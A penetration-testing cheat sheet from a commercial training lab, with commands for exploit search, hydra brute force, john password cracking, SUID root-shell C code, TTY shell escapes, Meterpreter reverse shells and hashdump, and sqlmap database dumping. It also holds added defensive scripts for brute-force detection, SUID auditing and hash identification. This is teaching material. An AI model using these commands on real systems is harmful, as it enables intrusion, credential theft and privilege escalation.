
Pentestit Corporate Laboratories: Case Analysis for Penetration Testing


Pentestit corporate laboratories are practical information security training courses, unique in format and content, built on the best penetration testing and security analysis practices and comparable in content to hacker conferences. Whatever the training program, its key features are up-to-date material and hands-on work in pentest laboratories, which makes up 80% of the course. In this article we continue our overview of basic commands and useful tricks for penetration testing.


Pentester's handbook, part 2


This handbook is a list of commands that you may need when conducting penetration testing. It is deliberately terse: it does not describe the commands in detail, but only gives working examples. For more information about a command or utility, study its man page or visit the official website.


This handbook focuses on network and infrastructure testing. Web application testing is not covered here, apart from a few sqlmap examples at the end. See also the first part of the handbook.


Search for exploits for detected services


Searching exploit-db with searchsploit; in this example, a local privilege escalation exploit for Windows 2003:


searchsploit windows 2003 | grep -i local 

Using Google to search exploit-db.com:


 site:exploit-db.com exploit kernel <= 3 

Searching Metasploit modules with grep; the built-in search command in msfconsole usually gives worse results:


 grep -R "W7" /usr/share/metasploit-framework/modules/exploits/windows/* 

Update the local copy of the exploit-db database, then search it:


 searchsploit -u
 searchsploit apache 2.2
 searchsploit "Linux Kernel"
 searchsploit linux 2.6 | grep -i ubuntu | grep local

Compiling exploits for Windows in Kali (MinGW under Wine):


 wget -O mingw-get-setup.exe http://sourceforge.net/projects/mingw/files/Installer/mingw-get-setup.exe/download
 wine mingw-get-setup.exe
 # in the installer, select mingw32-base
 cd /root/.wine/drive_c/windows
 wget http://gojhonny.com/misc/mingw_bin.zip && unzip mingw_bin.zip
 cd /root/.wine/drive_c/MinGW/bin
 wine gcc -o ability.exe /tmp/exploit.c -lwsock32
 wine ability.exe

Compiling for 32-bit and 64-bit architectures:


 gcc -m32 -o output32 hello.c   # 32-bit
 gcc -m64 -o output hello.c     # 64-bit

Run a simple local web server


Useful for delivering exploits and programs to the target machine. Run a simple http web server in Python:


 python -m SimpleHTTPServer 80 

Run a simple Python3 web server:


 python3 -m http.server 

Starting a simple Ruby webrick http server:


 ruby -rwebrick -e "WEBrick::HTTPServer.new(:Port => 80, :DocumentRoot => Dir.pwd).start" 

Run a simple php http server:


 php -S 0.0.0.0:80 

Mounting file resources


Mounting an NFS share on /mnt/nfs:


 mount 192.168.1.1:/vol/share /mnt/nfs 

Mounting a Windows CIFS/SMB share on Linux at /mnt/cifs. If you omit the password option, you will be prompted for it in the console (the safer choice, since the password will then not be written to .bash_history):


 mount -t cifs -o username=user,password=pass,domain=bla //192.168.1.X/share-name /mnt/cifs 

Mounting a Windows resource on Windows from the command line:


 net use Z: \\win-server\share password /user:domain\johndoe /savecred /p:no 

Installing smb4k on Kali, a useful Linux GUI for browsing SMB shares:


 apt-get install smb4k -y 

Examining HTTP/HTTPS web servers


Run nikto scan:


 nikto -h 192.168.1.1 

DirBuster, configured via its GUI (command-line input usually does not work):


 dirbuster 

Simple directory brute-forcer:


 dirb http://example.org 

Advanced directory and file brute-forcer. Searching for files with php and js extensions using a dictionary:


 dirsearch.py --random-agents -u example.org -e php,js 

Network packet analysis


tcpdump on port 80 of interface eth0, writing to output.pcap:


 tcpdump -i eth0 -w output.pcap tcp port 80 

Credential discovery


Several techniques for enumerating users and credentials from remote services.


SMB


Enumerating SMB users:


 python /usr/share/doc/python-impacket-doc/examples/samrdump.py 192.168.XXX.XXX 

RID cycling over SMB / SMB user enumeration:


 ridenum.py 192.168.XXX.XXX 500 50000 dict.txt 

SNMP


Enumerating users and hosts via SNMP (community string public):


 snmpwalk -c public -v1 192.168.X.XXX 1 | grep 11.11.11.11 | cut -d" " -f4
 python /usr/share/doc/python-impacket-doc/examples/samrdump.py SNMP 192.168.X.XXX
 nmap -sT -p 161 192.168.X.XXX/24 -oG snmp_results.txt

Brute-forcing network services


Hydra FTP brute force:


 hydra -l USERNAME -P /usr/share/wordlists/nmap.lst -f 192.168.X.XXX ftp -V 

Hydra POP3 brute force:


 hydra -L users.txt -P /usr/share/wordlists/nmap.lst 192.168.X.XXX pop3 -V 

Hydra SMTP brute force:


 hydra -l user@example.com -P /usr/share/wordlists/nmap.lst 192.168.X.XXX smtp -V 
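Brute-force tools such as hydra leave a very distinctive trace on the target: many authentication failures from one source in a short time, sometimes followed by a success. The following Python script is an added example (not part of the original handbook) of the detection logic a defender would run over authentication logs. The sshd-style log lines are constructed here for the demonstration, the log year is assumed (syslog timestamps carry none), and the threshold and window values are assumptions to tune for your environment.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample log (not from the article): a burst of failures from one
# source followed by a success, plus two unrelated failures from another host.
SAMPLE_LOG = """\
Mar 10 12:00:01 host sshd[1001]: Failed password for invalid user admin from 192.168.1.50 port 40001 ssh2
Mar 10 12:00:02 host sshd[1002]: Failed password for invalid user admin from 192.168.1.50 port 40002 ssh2
Mar 10 12:00:03 host sshd[1003]: Failed password for root from 192.168.1.50 port 40003 ssh2
Mar 10 12:00:04 host sshd[1004]: Failed password for root from 192.168.1.50 port 40004 ssh2
Mar 10 12:00:05 host sshd[1005]: Failed password for root from 192.168.1.50 port 40005 ssh2
Mar 10 12:00:06 host sshd[1006]: Accepted password for root from 192.168.1.50 port 40006 ssh2
Mar 10 12:30:00 host sshd[1010]: Failed password for alice from 10.0.0.7 port 50000 ssh2
Mar 10 13:00:00 host sshd[1011]: Failed password for alice from 10.0.0.7 port 50001 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>[\d.]+) port \d+"
)


def parse_line(line, year=2024):
    """Parse one sshd auth line into (timestamp, result, user, source IP).
    Returns None for lines that are not password authentication events.
    `year` is an assumption, because syslog timestamps do not include it."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["result"], m["user"], m["src"]


def detect_bruteforce(log_text, max_failures=5, window_seconds=60):
    """Return a list of alerts. A ('burst', src, count) alert is raised once
    per source when it accumulates max_failures failed logins inside a sliding
    window of window_seconds. A ('success_after_failures', src, user) alert is
    raised when a successful login follows recent failures from the same
    source, the signature of a guessed password."""
    recent = defaultdict(deque)   # src -> timestamps of failures still in window
    alerted = set()               # sources already reported for a burst
    alerts = []
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, result, user, src = parsed
        q = recent[src]
        # expire failures older than the window
        while q and (ts - q[0]).total_seconds() > window_seconds:
            q.popleft()
        if result == "Failed":
            q.append(ts)
            if len(q) >= max_failures and src not in alerted:
                alerted.add(src)
                alerts.append(("burst", src, len(q)))
        elif result == "Accepted" and q:
            alerts.append(("success_after_failures", src, user))
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG):
        print(alert)
```

The second alert type matters more than the first: a burst that ends in a success means the guessed account must be locked and the session investigated, whereas a burst alone is usually handled by rate limiting or fail2ban-style blocking.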

Password cracking with John the Ripper


Dictionary attack:


 john --wordlist=/usr/share/wordlists/rockyou.txt hashes 

MD5 dictionary attack:


 john --format=MD5 --wordlist=/usr/share/wordlists/rockyou.txt hash.txt 

DES hashes: show the passwords john has already cracked for the given hash file:


 john --format=DES hash --show 

SUID


It often happens that a vulnerable executable has the SUID bit set, but inside the program the effective UID is dropped to an unprivileged user before the vulnerable call, while we need a shell with superuser rights. Because the saved set-user-ID is still 0 in that case, setresuid() can restore root rights; the code below does that and then spawns a shell.


SUID C shell for /bin/bash:


 #define _GNU_SOURCE
 #include <stdlib.h>
 #include <unistd.h>

 int main(void) {
     setresuid(0, 0, 0);   /* real, effective and saved UID back to root */
     system("/bin/bash");
     return 0;
 }

SUID C shell for /bin/sh:


 #define _GNU_SOURCE
 #include <stdlib.h>
 #include <unistd.h>

 int main(void) {
     setresuid(0, 0, 0);   /* real, effective and saved UID back to root */
     system("/bin/sh");
     return 0;
 }

Compile the SUID shell executable:


 gcc -o suid suid.c 

For 32-bit:


 gcc -m32 -o suid suid.c 
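From the defender's side, the counterpart to this trick is knowing which SUID binaries exist on a host and whether any of them can be tampered with. The Python script below is an added example (not from the handbook) that does the equivalent of find / -perm -4000 and additionally flags SUID files that are group- or world-writable, since anyone who can replace such a file gets code running as its owner. The sample tree it builds under a temporary directory is constructed for the demonstration.

```python
import os
import shutil
import stat
import tempfile


def audit_suid(root):
    """Walk `root` and return a sorted list of (path, owner_uid, risk) for every
    regular file with the setuid bit. risk is 'writable' when the file is
    group- or world-writable, otherwise 'setuid'. Symlinks are skipped because
    lstat() is used and the bit only matters on the real file."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue   # vanished or unreadable entry
            if not stat.S_ISREG(st.st_mode) or not (st.st_mode & stat.S_ISUID):
                continue
            writable = bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))
            findings.append((path, st.st_uid, "writable" if writable else "setuid"))
    return sorted(findings)


def make_demo_tree(base):
    """Constructed sample tree (not real system binaries): three scripts under
    base/bin with different permission bits."""
    bindir = os.path.join(base, "bin")
    os.makedirs(bindir, exist_ok=True)
    for name, mode in (("good", 0o4755), ("bad", 0o4777), ("plain", 0o755)):
        path = os.path.join(bindir, name)
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\necho demo\n")
        os.chmod(path, mode)


def demo():
    """Build the sample tree in a temporary directory, audit it, and return
    (basename, risk) pairs for the flagged files."""
    base = tempfile.mkdtemp(prefix="suid-audit-")
    try:
        make_demo_tree(base)
        return [(os.path.basename(p), risk) for p, _uid, risk in audit_suid(base)]
    finally:
        shutil.rmtree(base, ignore_errors=True)


if __name__ == "__main__":
    # Real use: audit a system directory and compare against a known baseline.
    for path, uid, risk in audit_suid("/usr/bin"):
        print(f"{risk:8} uid={uid} {path}")
```

In practice the list is compared against a baseline taken at install time: a new SUID file, or an existing one that became writable, is what an intrusion or a bad package post-install script looks like.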

Tty shells


Examples of obtaining a TTY shell from a restricted shell in Linux, useful for running commands like su from a reverse shell. Python TTY shell:


 python -c 'import pty; pty.spawn("/bin/bash")'
 python -c 'import os; os.system("/bin/bash")'

Getting an interactive sh shell:


 /bin/sh -i 

Getting a Perl TTY shell:


 perl -e 'exec "/bin/sh";'
 # or, inside a Perl script:
 exec "/bin/sh";

Getting a Ruby TTY shell:


 # inside irb or a Ruby script:
 exec "/bin/sh"

Getting a Lua TTY shell:


 # inside the Lua interpreter:
 os.execute('/bin/sh')

Getting a TTY shell from Vi:


 :!bash 

Getting a TTY shell via nmap (old versions):


 nmap --interactive
 nmap> !sh

Metasploit / Meterpreter


Windows Meterpreter payload with a reverse TCP connection:


 set payload windows/meterpreter/reverse_tcp 

Windows VNC Meterpreter payload:


 set payload windows/vncinject/reverse_tcp
 set ViewOnly false

Linux Meterpreter payload with a reverse TCP connection:


 set payload linux/meterpreter/reverse_tcp 

Meterpreter Handbook


Upload a file to the Windows machine via Meterpreter:


 upload file c:\\windows 

Download a file from the target Windows machine via Meterpreter:


 download c:\\windows\\repair\\sam /tmp 

Run an exe file via Meterpreter, ideal for executing uploaded exploits:


 execute -f c:\\windows\\temp\\exploit.exe 

Create a new channel with a cmd shell:


 execute -f cmd -c 

List processes:


 ps 

Drop into a system shell for the current session:


 shell 

Try to escalate privileges on the system:


 getsystem 

Dump the hashes of OS users:


 hashdump 

Create a port forward through the target machine (pivoting):


 portfwd add -l 3389 -p 3389 -r target_host 

Remove the port forward (pivoting):


 portfwd delete -l 3389 -p 3389 -r target_host 

SQLMap examples


Automatic mode:


 sqlmap -u http://site --forms --batch --crawl=10 --cookie=jsessionid=54321 --level=5 --risk=3 

Targeted scan:


 sqlmap -u TARGET -p PARAM --data=POSTDATA --cookie=COOKIE --level=3 --current-user --current-db --passwords --file-read="/var/www/bla.php" 

Scan the URL for union- and error-based injection on MySQL, use a random user agent and dump the database:


 sqlmap -u "http://site/bla.php?id=1" --dbms=mysql --technique=UE --random-agent --dump 

Check forms for injection:


 sqlmap -o -u "http://site/form/" --forms 

Dump the users table of database database-name and crack the password hashes it contains:


 sqlmap -o -u "http://site/vuln-form" --forms -D database-name -T users --dump 

Determining the type of hashes


It is most convenient to use the hash-identifier utility, but for clarity here are several hash types shown visually:


MD5 Hash:


 8743b52063cd84097a65d1633f5c74f5 

MD5($PASS:$SALT):


 01dfae6e5d4d90d9892622325959afbe:7050461 

MD5($SALT:$PASS):


 f0fda58630310a6dd91a7d8f0a4ceda2:4225637426 

SHA1 hash:


 b89eaac7e61417341b710b727768294d0e6a277b 

SHA1($PASS:$SALT):


 2fc5a684737ce1bf7b3b239df432416e0dd07357:2014 

SHA1($SALT:$PASS):


 cac35ec206d868b7d7cb0b55f31d9425b075082b:5363620024 

SHA-256:


 127e6fbfe24a750e72930c220a8e138275656b8e5d8f48a98c3c92df2caba935 

SHA-256($PASS:$SALT):


 c73d08de890479518ed60cf670d17faa26a4a71f995c1dcc978165399401a6c4 

SHA-256($SALT:$PASS):


 eb368a2dfd38b405f014118c7d9747fcc97f4f0ee75c05963cd9da6ee65ef498:560407001617 

SHA-512:


 82a9dda829eb7f8ffe9fbe49e45d47d2dad9664fbb7adf72492e3c81ebd3e29134d9bc12212bf83c6840f10e8246b9db54a4859b7ccd0123d86e5872c1e5082f 

SHA-512($PASS:$SALT):


 e5c3ede3e49fb86592fb03f471c35ba13e8d89b8ab65142c9a8fdafb635fa2223c24e5558fd9313e8995019dcbec1fb584146b7bb12685c7765fc8c0d51379fd 

SHA-512($SALT:$PASS):


 976b451818634a1e2acba682da3fd6efa72adf8a7a08d7939550c244b237c72c7d42367544e826c0c83fe5c02f97c0373b6b1386cc794bf0d21d2df01bb9c08a 

NTLM:


 b4b9b02e6f09a9bd760f388b67351e2b 
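The list above shows why length alone identifies only the family of a hash: MD5 and NTLM are both 32 hex characters, and nothing in a digest:salt string says whether the salt was appended or prepended. The Python snippet below is an added example (not part of the handbook, and not the hash-identifier utility) of such a heuristic classifier. It maps a digest's hex length to candidate algorithms, treats a trailing :salt as the salted variants, and includes a compute() helper that produces the digest each notation denotes, so a classification can be confirmed against a known password and salt (for instance from a test account). The length table and hashlib names are standard values; NTLM is left out of compute() because hashlib's MD4 support depends on the OpenSSL build.

```python
import hashlib
import re

HEX_RE = re.compile(r"^[0-9a-f]+$", re.IGNORECASE)

# Digest length in hex characters -> candidate algorithms (standard sizes).
DIGEST_LENGTHS = {
    32: ("MD5", "NTLM"),
    40: ("SHA1",),
    64: ("SHA-256",),
    128: ("SHA-512",),
}

# Names used in the list above -> hashlib constructor names.
HASHLIB_NAMES = {"MD5": "md5", "SHA1": "sha1", "SHA-256": "sha256", "SHA-512": "sha512"}


def identify_hash(value):
    """Heuristically classify a hash given as a bare hex digest or as
    digest:salt. Returns a list of candidate names, or [] if the string does
    not look like either form. Every candidate the length allows is returned,
    because the cracker has to try each of them anyway."""
    parts = value.strip().split(":")
    if len(parts) > 2:
        return []
    digest = parts[0]
    salt = parts[1] if len(parts) == 2 else None
    if not HEX_RE.match(digest):
        return []
    names = DIGEST_LENGTHS.get(len(digest), ())
    if salt is None:
        return list(names)
    # NTLM is an unsalted MD4 of the UTF-16LE password; a trailing salt rules it out.
    salted = [n for n in names if n != "NTLM"]
    return ([f"{n}($PASS:$SALT)" for n in salted]
            + [f"{n}($SALT:$PASS)" for n in salted])


def compute(algorithm, password, salt="", order="pass_salt"):
    """Produce the hex digest the notations above denote: hash(password + salt)
    for $PASS:$SALT ('pass_salt'), hash(salt + password) for $SALT:$PASS
    ('salt_pass'). With no salt this is the plain digest."""
    data = password + salt if order == "pass_salt" else salt + password
    return hashlib.new(HASHLIB_NAMES[algorithm], data.encode()).hexdigest()


if __name__ == "__main__":
    for sample in ("8743b52063cd84097a65d1633f5c74f5",
                   "01dfae6e5d4d90d9892622325959afbe:7050461",
                   "b89eaac7e61417341b710b727768294d0e6a277b"):
        print(sample, "->", identify_hash(sample))
```

The classifier is deliberately conservative: it reports families, not a single answer. Tools like hash-identifier and john's format autodetection apply the same length-and-charset logic with a much larger table, which is why both still list several candidates for a 32-character hex string.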

Conclusion


To resist attackers successfully, you need to know their methods and tools well, which is extremely difficult given how quickly they evolve. The course program is updated with every intake, which lets us provide up-to-date knowledge and practical skills in information security.


The course program is unique in how the material is presented and reinforced: 20% theory and 80% practice. By constantly updating the teaching material and adding practical tasks, we try to give participants the most complete picture of current threats and countermeasures, and to open new avenues of development in practical information security.


View the course program.



Source: https://habr.com/ru/post/325602/

